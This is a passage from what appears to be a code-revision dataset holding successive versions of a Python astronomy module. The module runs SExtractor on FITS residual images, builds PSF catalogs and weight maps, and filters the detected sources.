os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (image, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(image) * -1, header=fits.\n getheader(image))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(image, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits')\n os.system('sextractor %s/residuals/temp.fits[0]> %s/temp/%s.txt -c %s' %\n (location, sources, name, config_loc))\n os.remove('%s/residuals/temp.fits' % location)\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_psf(location):\n x = 0\n psf_loc = location + '/psf'\n data = location + '/data'\n templates = location + '/templates'\n check = os.path.exists(psf_loc)\n if check == False:\n os.system('mkdir %s' % psf_loc)\n temps = glob.glob(templates + '/*.fits')\n images = glob.glob(data + '/*_A_.fits')\n for t in temps:\n images.append(t)\n cats = glob.glob(location + '/psf/*.cat')\n images_names = [i.split('/')[-1][:-5] for i in images]\n cats_names = [c.split('/')[-1][:-4] for c in cats]\n imageCats = [im for im in images_names if im not in cats_names]\n images = []\n if temps == []:\n temps.append('')\n for imcats in imageCats:\n if imcats == temps[0].split('/')[-1][:-5]:\n images.append(temps[0])\n else:\n images.append(location + '/data/' + imcats + '.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[19\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalogs...')\n if len(temps) == 1:\n for i in images:\n name = i.split('/')[-1][:-5]\n hdu = fits.open(i)\n hdr = hdu[0].header\n pixscale = hdr['PIXSCALE']\n hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6] = ('CATALOG_NAME' + ' ' + psf_loc + '/' + name +\n '.cat' + '\\n')\n data[44] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (i, config_loc))\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' % per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'psf' directory\\n\" %\n len(images))\n else:\n print('\\n-> Error: Problem with number of template images\\n')\n sys.exit()\n return images\n\n\ndef sextractor_psf_sim(location, image):\n psf_loc = location + '/psf'\n data = location + '/data'\n check = os.path.exists(psf_loc)\n length = len(data) + 1\n if check == False:\n os.system('mkdir %s' % psf_loc)\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalog of fake image...')\n name = image[length:-5]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6\n ] = 'CATALOG_NAME' + ' ' + psf_loc + '/' + name + '.cat' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (image, config_loc))\n\n\ndef weight_map(image):\n hdu = fits.open(image)\n hduMask = hdu[1].data\n zeroMask = np.zeros(hduMask.shape)\n weightMap = np.logical_not(np.logical_or(hduMask, zeroMask)).astype(float)\n hdu.close()\n return weightMap\n\n\ndef src_join(location):\n source_loc = location + '/sources'\n temp_source_loc = source_loc + '/temp'\n temp_source_files = glob.glob(temp_source_loc + '/*.txt')\n image_names = filters.get_image_names(location)\n for file in temp_source_files:\n with open(file, 'r') as fl:\n data = fl.readlines()\n data = [str(file.replace('txt', 'fits')[len(source_loc) + 6:]) + '\\n'\n ] + data\n data.append('\\n\\n\\n')\n with open(source_loc + '/sources.txt', 'a+') as s:\n if data[0] not in image_names:\n s.writelines(data)\n os.remove(file)\n try:\n os.rmdir(temp_source_loc)\n except:\n print(\"-> Error: Problem removing temp directory in '/sources'\")\n\n\ndef filter_sources(location, mask_sources=False):\n print('\\n-> Filtering out non PSF-like sources...')\n filters.spread_model_filter(location)\n print('-> Filtering out diveted detections...')\n images = glob.glob(location + '/data/*_A_.fits')\n for i in images:\n indices = filters.divot(i)\n filters.update_filtered_sources(location, indices)\n residuals = glob.glob('%s/residuals/*_residual_.fits' % location)\n if mask_sources == True:\n for r in residuals:\n filters.mask_sources_image(r)\n\n\ndef MR_filter_sources(location):\n with open('%s/sources/MR_sources.txt' % location, 'r') as MR_src:\n MR_lines = MR_src.readlines()\n MR_lines.insert(0, 'MR.fits\\n')\n with open('%s/sources/MR_sources.txt' % location, 'w+') as MR_src:\n for line in MR_lines:\n MR_src.write(line)\n MR_loc = '%s/residuals/MR.fits' % location\n print('\\n-> Filtering out non PSF-like sources in master residual...')\n filters.spread_model_filter(location, MR=True)\n print('-> Filtering out diveted detections in master residual...')\n indices = filters.divot(MR_loc, MR=True)\n filters.update_filtered_sources(location, indices, MR=True)\n filters.write_total_sources(location)\n\n\ndef append_negative_sources(residual, MR=False):\n location = residual.split('/')[:-2]\n location = '/'.join(location)\n name = residual.split('/')[-1]\n name = name.replace('.fits', '')\n if MR == True:\n with open('%s/sources/%s_sources_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/%s_sources.txt' % (location, name), 'a'\n ) as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/%s_sources_2.txt' % (location, name))\n else:\n with open('%s/sources/temp/%s_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/temp/%s.txt' % (location, name), 'a') as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/temp/%s_2.txt' % (location, name))\n",
"step-4": "<mask token>\nimport os\nimport glob\nimport initialize\nimport psf\nfrom astropy.io import fits\nimport filters\nimport numpy as np\nimport sys\nimport MR\nfrom tqdm import tqdm\n\n\ndef sextractor_MR(location, MR_method='swarp', use_config_file=True):\n \"\"\"\n runs SExtractor on master residual\n \"\"\"\n check_MR = glob.glob('%s/residuals/MR.fits' % location)\n if check_MR == []:\n print('-> Master residual does not exist, creating it first...')\n if use_config_file == True:\n MR_method = initialize.get_config_value('MR_method')\n MR.MR(location, MR_method)\n master_res = glob.glob('%s/residuals/MR.fits' % location)\n temp = glob.glob('%s/templates/*.fits' % location)\n if len(master_res) == 1:\n if len(temp) == 1:\n MR = master_res[0]\n template = temp[0]\n temp_name = template.split('/')[-1]\n temp_name = temp_name[:-5]\n MR_hdu = fits.open(MR)\n MR_header = MR_hdu[0].header\n saturate = MR_header['SATURATE']\n temp_hdr = fits.getheader(template)\n pixscale = temp_hdr['PIXSCALE']\n MR_hdu.close()\n FWHM = psf.fwhm_template(template)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20] = ('FILTER_NAME' + ' ' + location +\n '/configs/default.conv' + '\\n')\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> SExtracting master residual...')\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = 'SATUR_LEVEL' + ' ' + str(saturate) + '\\n'\n data[62] = 'SEEING_FWHM' + ' ' + str(FWHM) + '\\n'\n data[106] = ('PSF_NAME' + ' ' + location + '/psf/' +\n temp_name + '.psf' + '\\n')\n data[58] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n data[32] = 'WEIGHT_IMAGE' + ' ' + '%s[1]' % MR + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/sources/MR_sources.txt -c %s' %\n (MR, location, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(MR) * -1, header=\n fits.getheader(MR))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(MR, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/MR_neg.fits' % location)\n os.system(\n 'sextractor %s/residuals/MR_neg.fits[0]> %s/sources/MR_sources_2.txt -c %s'\n % (location, location, config_loc))\n append_negative_sources(MR, MR=True)\n MR_filter_sources(location)\n else:\n print(\n \"\"\"-> Error: Problem with number of template images\n-> Could not finish SExtracting master residual\"\"\"\n )\n else:\n print(\n \"\"\"-> Error: Problem with number of master residuals\n-> Could not finish SExtracting master residual\"\"\"\n )\n\n\ndef sextractor(location):\n \"\"\"\n runs SExtractor on all residual images\n \"\"\"\n x = 0\n sources = location + '/sources'\n residuals = location + '/residuals'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n length = len(residuals) + 1\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n images = glob.glob(residuals + '/*_residual_.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('-> Converting all residual masks into weight maps...\\n')\n for r in tqdm(images):\n weight = weight_map(r)\n hdu = fits.open(r, mode='update')\n data = hdu[0].data\n hdr = hdu[0].header\n try:\n if hdr['WEIGHT'] == 'N':\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n except KeyError:\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n hdu.close()\n try:\n if fits.getval(r, 'NORM') == 'N':\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n except KeyError:\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n print('\\n-> SExtracting residual images...')\n for i in images:\n name = i[length:-5]\n data_name = location + '/data/' + name.replace('residual_', ''\n ) + '.fits'\n FWHM = psf.fwhm(data_name)\n im_hdu = fits.open(data_name)\n im_header = im_hdu[0].header\n saturate = im_header['SATURATE']\n pixscale = im_header['PIXSCALE']\n im_hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = 'SATUR_LEVEL' + ' ' + str(saturate) + '\\n'\n data[62] = 'SEEING_FWHM' + ' ' + str(FWHM) + '\\n'\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-9\n ] + '.psf' + '\\n'\n data[58] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n data[32] = 'WEIGHT_IMAGE' + ' ' + '%s[1]' % i + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (i, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(i) * -1, header=fits.\n getheader(i))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(i, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits' % location)\n os.system(\n 'sextractor %s/residuals/temp.fits[0]> %s/temp/%s_2.txt -c %s' %\n (location, sources, name, config_loc))\n append_negative_sources(i)\n os.remove('%s/residuals/temp.fits' % location)\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' % per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'sources' directory\\n\" %\n len(images))\n print('-> Filtering source catalogs...\\n')\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_sim(image):\n location = image.split('/')[:-2]\n location = '/'.join(location)\n sources = location + '/sources'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> SExtracting fake image...')\n name = image.split('/')[-1]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-5\n ] + '.psf' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (image, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(image) * -1, header=fits.\n getheader(image))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(image, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits')\n os.system('sextractor %s/residuals/temp.fits[0]> %s/temp/%s.txt -c %s' %\n (location, sources, name, config_loc))\n os.remove('%s/residuals/temp.fits' % location)\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_psf(location):\n x = 0\n psf_loc = location + '/psf'\n data = location + '/data'\n templates = location + '/templates'\n check = os.path.exists(psf_loc)\n if check == False:\n os.system('mkdir %s' % psf_loc)\n temps = glob.glob(templates + '/*.fits')\n images = glob.glob(data + '/*_A_.fits')\n for t in temps:\n images.append(t)\n cats = glob.glob(location + '/psf/*.cat')\n images_names = [i.split('/')[-1][:-5] for i in images]\n cats_names = [c.split('/')[-1][:-4] for c in cats]\n imageCats = [im for im in images_names if im not in cats_names]\n images = []\n if temps == []:\n temps.append('')\n for imcats in imageCats:\n if imcats == temps[0].split('/')[-1][:-5]:\n images.append(temps[0])\n else:\n images.append(location + '/data/' + imcats + '.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[19\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalogs...')\n if len(temps) == 1:\n for i in images:\n name = i.split('/')[-1][:-5]\n hdu = fits.open(i)\n hdr = hdu[0].header\n pixscale = hdr['PIXSCALE']\n hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6] = ('CATALOG_NAME' + ' ' + psf_loc + '/' + name +\n '.cat' + '\\n')\n data[44] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (i, config_loc))\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' % per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'psf' directory\\n\" %\n len(images))\n else:\n print('\\n-> Error: Problem with number of template images\\n')\n sys.exit()\n return images\n\n\ndef sextractor_psf_sim(location, image):\n psf_loc = location + '/psf'\n data = location + '/data'\n check = os.path.exists(psf_loc)\n length = len(data) + 1\n if check == False:\n os.system('mkdir %s' % psf_loc)\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalog of fake image...')\n name = image[length:-5]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6\n ] = 'CATALOG_NAME' + ' ' + psf_loc + '/' + name + '.cat' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (image, config_loc))\n\n\ndef weight_map(image):\n hdu = fits.open(image)\n hduMask = hdu[1].data\n zeroMask = np.zeros(hduMask.shape)\n weightMap = np.logical_not(np.logical_or(hduMask, zeroMask)).astype(float)\n hdu.close()\n return weightMap\n\n\ndef src_join(location):\n source_loc = location + '/sources'\n temp_source_loc = source_loc + '/temp'\n temp_source_files = glob.glob(temp_source_loc + '/*.txt')\n image_names = filters.get_image_names(location)\n for file in temp_source_files:\n with open(file, 'r') as fl:\n data = fl.readlines()\n data = [str(file.replace('txt', 'fits')[len(source_loc) + 6:]) + '\\n'\n ] + data\n data.append('\\n\\n\\n')\n with open(source_loc + '/sources.txt', 'a+') as s:\n if data[0] not in image_names:\n s.writelines(data)\n os.remove(file)\n try:\n os.rmdir(temp_source_loc)\n except:\n print(\"-> Error: Problem removing temp directory in '/sources'\")\n\n\ndef filter_sources(location, mask_sources=False):\n print('\\n-> Filtering out non PSF-like sources...')\n filters.spread_model_filter(location)\n print('-> Filtering out diveted detections...')\n images = glob.glob(location + '/data/*_A_.fits')\n for i in images:\n indices = filters.divot(i)\n filters.update_filtered_sources(location, indices)\n residuals = glob.glob('%s/residuals/*_residual_.fits' % location)\n if mask_sources == True:\n for r in residuals:\n filters.mask_sources_image(r)\n\n\ndef MR_filter_sources(location):\n with open('%s/sources/MR_sources.txt' % location, 'r') as MR_src:\n MR_lines = MR_src.readlines()\n MR_lines.insert(0, 'MR.fits\\n')\n with open('%s/sources/MR_sources.txt' % location, 'w+') as MR_src:\n for line in MR_lines:\n MR_src.write(line)\n MR_loc = '%s/residuals/MR.fits' % location\n print('\\n-> Filtering out non PSF-like sources in master residual...')\n filters.spread_model_filter(location, MR=True)\n print('-> Filtering out diveted detections in master residual...')\n indices = filters.divot(MR_loc, MR=True)\n filters.update_filtered_sources(location, indices, MR=True)\n filters.write_total_sources(location)\n\n\ndef append_negative_sources(residual, MR=False):\n location = residual.split('/')[:-2]\n location = '/'.join(location)\n name = residual.split('/')[-1]\n name = name.replace('.fits', '')\n if MR == True:\n with open('%s/sources/%s_sources_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/%s_sources.txt' % (location, name), 'a'\n ) as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/%s_sources_2.txt' % (location, name))\n else:\n with open('%s/sources/temp/%s_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/temp/%s.txt' % (location, name), 'a') as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/temp/%s_2.txt' % (location, name))\n",
"step-5": "#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 4 13:04:32 2018\n\n@author: andrew\n\"\"\"\n\nimport os\nimport glob\nimport initialize\nimport psf\nfrom astropy.io import fits\nimport filters\nimport numpy as np\nimport sys\nimport MR\nfrom tqdm import tqdm\n\ndef sextractor_MR(location, MR_method='swarp', use_config_file=True):\n '''\n runs SExtractor on master residual\n '''\n check_MR = glob.glob(\"%s/residuals/MR.fits\" % (location))\n if check_MR == []:\n print(\"-> Master residual does not exist, creating it first...\")\n if use_config_file == True:\n MR_method = initialize.get_config_value('MR_method')\n MR.MR(location, MR_method)\n master_res = glob.glob(\"%s/residuals/MR.fits\" % (location))\n temp = glob.glob(\"%s/templates/*.fits\" % (location))\n if len(master_res) == 1:\n if len(temp) == 1:\n MR = master_res[0]\n template = temp[0]\n temp_name = template.split('/')[-1]\n temp_name = temp_name[:-5]\n MR_hdu = fits.open(MR)\n MR_header = MR_hdu[0].header\n saturate = MR_header['SATURATE']\n temp_hdr = fits.getheader(template)\n pixscale = temp_hdr['PIXSCALE']\n MR_hdu.close()\n FWHM = psf.fwhm_template(template)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = \"PARAMETERS_NAME\" + \" \" + location + \"/configs/default.param\" + \"\\n\"\n data[20] = \"FILTER_NAME\" + \" \" + location + \"/configs/default.conv\" + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print(\"\\n-> SExtracting master residual...\")\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = \"SATUR_LEVEL\" + \" \" + str(saturate) + \"\\n\"\n data[62] = \"SEEING_FWHM\" + \" \" + str(FWHM) + \"\\n\"\n data[106] = \"PSF_NAME\" + \" \" + location + \"/psf/\" + temp_name + \".psf\" + \"\\n\"\n data[58] = \"PIXEL_SCALE\" + \" \" + str(pixscale) + \"\\n\"\n data[32] = \"WEIGHT_IMAGE\" + \" \" + \"%s[1]\" % (MR) + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system(\"sextractor %s[0]> %s/sources/MR_sources.txt -c %s\" % (MR, location, config_loc))\n temp_hdu_data = fits.PrimaryHDU((fits.getdata(MR))*-1, header=fits.getheader(MR))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(MR, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto(\"%s/residuals/MR_neg.fits\" % (location))\n os.system(\"sextractor %s/residuals/MR_neg.fits[0]> %s/sources/MR_sources_2.txt -c %s\" % (location, location, config_loc))\n append_negative_sources(MR, MR=True)\n MR_filter_sources(location)\n else:\n print(\"-> Error: Problem with number of template images\\n-> Could not finish SExtracting master residual\")\n else:\n print(\"-> Error: Problem with number of master residuals\\n-> Could not finish SExtracting master residual\")\n\ndef sextractor(location):\n '''\n runs SExtractor on all residual images\n '''\n x = 0\n sources = location + \"/sources\"\n residuals = location + \"/residuals\"\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n length = len(residuals) + 1\n if check == False:\n os.system(\"mkdir %s\" % (sources))\n os.system(\"mkdir %s/temp\" % (sources))\n else:\n if check_temp == False:\n os.system(\"mkdir %s/temp\" % (sources))\n images = glob.glob(residuals + \"/*_residual_.fits\")\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = \"PARAMETERS_NAME\" + \" \" + location + \"/configs/default.param\" + \"\\n\"\n data[20] = \"FILTER_NAME\" + \" \" + location + \"/configs/default.conv\" + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print(\"-> Converting all residual masks into weight maps...\\n\")\n for r in tqdm(images):\n weight = weight_map(r)\n hdu = fits.open(r, mode='update')\n data = hdu[0].data\n hdr = hdu[0].header\n try:\n if hdr['WEIGHT'] == 'N':\n hdr.set('WEIGHT','Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n except KeyError:\n hdr.set('WEIGHT','Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n hdu.close()\n try:\n if fits.getval(r, 'NORM') == 'N':\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n except KeyError:\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n print(\"\\n-> SExtracting residual images...\")\n for i in images:\n name = i[length:-5]\n data_name = location + '/data/' + name.replace('residual_','') + '.fits'\n FWHM = psf.fwhm(data_name)\n im_hdu = fits.open(data_name)\n im_header = im_hdu[0].header\n saturate = im_header['SATURATE']\n pixscale = im_header['PIXSCALE']\n im_hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = \"SATUR_LEVEL\" + \" \" + str(saturate) + \"\\n\"\n data[62] = \"SEEING_FWHM\" + \" \" + str(FWHM) + \"\\n\"\n data[106] = \"PSF_NAME\" + \" \" + location + \"/psf/\" + name[:-9] + \".psf\" + \"\\n\"\n data[58] = \"PIXEL_SCALE\" + \" \" + str(pixscale) + \"\\n\"\n data[32] = \"WEIGHT_IMAGE\" + \" \" + \"%s[1]\" % (i) + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system(\"sextractor %s[0]> %s/temp/%s.txt -c %s\" % (i, sources, name, config_loc))\n temp_hdu_data = fits.PrimaryHDU((fits.getdata(i))*-1, header=fits.getheader(i))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(i, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto(\"%s/residuals/temp.fits\" % (location))\n os.system(\"sextractor %s/residuals/temp.fits[0]> %s/temp/%s_2.txt -c %s\" % (location, sources, name, config_loc))\n append_negative_sources(i)\n os.remove(\"%s/residuals/temp.fits\" % (location))\n x += 1\n per = float(x)/float(len(images)) * 100\n print(\"\\t %.1f%% sextracted...\" % (per))\n print(\"-> SExtracted %d images, catalogues placed in 'sources' directory\\n\" % (len(images)))\n print(\"-> Filtering source catalogs...\\n\")\n src_join(location)\n filter_sources(location)\n \ndef sextractor_sim(image):\n location = image.split('/')[:-2]\n location = '/'.join(location)\n sources = location + \"/sources\"\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n if check == False:\n os.system(\"mkdir %s\" % (sources))\n os.system(\"mkdir %s/temp\" % (sources))\n else:\n if check_temp == False:\n os.system(\"mkdir %s/temp\" % (sources))\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = \"PARAMETERS_NAME\" + \" \" + location + \"/configs/default.param\" + \"\\n\"\n data[20] = \"FILTER_NAME\" + \" \" + location + \"/configs/default.conv\" + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print(\"\\n-> SExtracting fake image...\")\n name = image.split('/')[-1]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[106] = \"PSF_NAME\" + \" \" + location + \"/psf/\" + name[:-5] + \".psf\" + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system(\"sextractor %s[0]> %s/temp/%s.txt -c %s\" % (image, sources, name, config_loc))\n temp_hdu_data = fits.PrimaryHDU((fits.getdata(image))*-1, header=fits.getheader(image))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(image, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto(\"%s/residuals/temp.fits\")\n os.system(\"sextractor %s/residuals/temp.fits[0]> %s/temp/%s.txt -c %s\" % (location, sources, name, config_loc))\n os.remove(\"%s/residuals/temp.fits\" % (location))\n src_join(location)\n filter_sources(location)\n \ndef sextractor_psf(location):\n x = 0\n psf_loc = location + \"/psf\"\n data = location + \"/data\"\n templates = location + \"/templates\"\n check = os.path.exists(psf_loc)\n if check == False:\n os.system(\"mkdir %s\" % (psf_loc))\n temps = glob.glob(templates + \"/*.fits\")\n images = glob.glob(data + \"/*_A_.fits\")\n for t in temps:\n images.append(t)\n cats = glob.glob(location + '/psf/*.cat')\n images_names = [(i.split('/')[-1])[:-5] for i in images]\n cats_names = [(c.split('/')[-1])[:-4] for c in cats]\n imageCats = [im for im in images_names if im not in cats_names]\n images = []\n if temps == []:\n temps.append('')\n for imcats in imageCats:\n if imcats == (temps[0].split('/')[-1])[:-5]:\n images.append(temps[0])\n else:\n images.append(location+'/data/'+imcats+'.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = \"PARAMETERS_NAME\" + \" \" + location + \"/configs/default.psfex\" + \"\\n\"\n data[19] = \"FILTER_NAME\" + \" \" + location + \"/configs/default.conv\" + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print(\"\\n-> Creating PSF catalogs...\")\n if len(temps) == 1:\n for i in images:\n name = i.split('/')[-1][:-5]\n hdu = fits.open(i)\n hdr = hdu[0].header\n pixscale = hdr['PIXSCALE']\n hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6] = \"CATALOG_NAME\" + \" \" + psf_loc + \"/\" + name + \".cat\" + \"\\n\"\n data[44] = \"PIXEL_SCALE\" + \" \" + str(pixscale) + \"\\n\"\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system(\"sextractor %s[0] -c %s\" % (i, config_loc))\n x += 1\n per = float(x)/float(len(images)) * 100\n print(\"\\t %.1f%% sextracted...\" % (per))\n print(\"-> SExtracted %d images, catalogues placed in 'psf' directory\\n\" % (len(images)))\n else:\n print(\"\\n-> Error: Problem with number of template images\\n\")\n sys.exit()\n return images\n\ndef sextractor_psf_sim(location, image):\n psf_loc = location + \"/psf\"\n data = location + \"/data\"\n check = 